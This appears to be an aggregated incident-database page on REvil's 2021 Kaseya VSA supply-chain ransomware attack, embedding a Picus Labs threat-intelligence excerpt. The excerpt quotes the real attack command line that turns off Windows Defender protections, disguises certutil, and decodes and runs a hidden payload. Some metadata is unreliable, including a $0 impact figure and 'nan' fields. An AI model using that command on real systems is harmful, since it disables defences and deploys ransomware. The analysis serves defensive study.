💰🔗

Kaseya Security Incident

2021 1725 days ago Resolved

Incident Overview

Situation Description

Picus Labs updated its threat library with REvil ransomware samples used in a massive cyberattack targeting Kaseya's MSP supply chain, affecting thousands of customers.

Event Types

Ransomware Supply Chain Compromise

Industry Sector

Technology

Geographic Scope

Global

Response Actions

Took Systems or Services Offline Managed Public Narrative & Crisis Communications

Impact Analysis

Event Types (2 identified)

Ransomware Supply Chain Compromise

Financial Impact

$0 USD

Records Affected

Primary Impacts

Operational Disruption

Key Decisions Made

Kaseya advised on-premise partners to keep their VSA servers offline until further notice.; Kaseya stated that SaaS and Hosted VSA Servers would be operational once operations could be safely restored.

Technical Analysis

Attack Method

Supply Chain Compromise

Threat Actor Attribution

REvil Sodinokibi

Additional Information

Picus Labs | 7 MIN READ LAST UPDATED ON MARCH 24, 2023 TTPs Used by REvil (Sodinokibi) Ransomware Gang in Kaseya MSP Supply-Chain Attack Summarize with: ChatGPT perplexity Google AI Kaseya MSP Supply-Chain Attack Picus Labs has updated the Picus Threat Library with REvil (Sodinokibi) ransomware samples that are used in a massive cyberattack that targets multiple Managed Service Providers (MSPs) and thousands of their customers. As with all recent large-scale cyberattacks, this attack is also a supply chain attack. REvil ransomware gang targetedMSPs and their customersthrough Kaseya VSA cloud-based MSP platform enabling service providers to perform patch management and client monitoring. Attack Life-Cycle and Tactics, Techniques and Procedures (TTPs) The Initial Access technique is MITRE ATT&CK T1059.002 Supply Chain Compromise. Kaseya VSA platform drops a base64 encodedfile ( agent.crt ) to the C:\kworking folder,which will be delivered as part of the 'Kaseya VSA Agent Hot-fix' update. After that, the following PowerShell command is launched by the C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe file of the Kaseya VSA platform. The REvil threat actors use PowerShell as the execution technique ( MITRE ATT&CK T1059.001 Command and Scripting Interpreter: PowerShell ). "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe This command first disables Real Time Protection...

... (truncated for display)

Quick Facts

Company:: Kaseya
Date:: 2021
Status:: Resolved
Decision Maker:: nan
Position:: nan
Published:: 24/03/2023

Source Information

Original Query

"Kaseya" VSA ransomware attack "supply chain" response

View Original Source

Timeline

Information Published

24/03/2023

Incident Occurred

2021 (1725 days ago)

Status: Resolved

Estimated resolution based on age

Actions

View Company Profile

Navigation

Quick Stats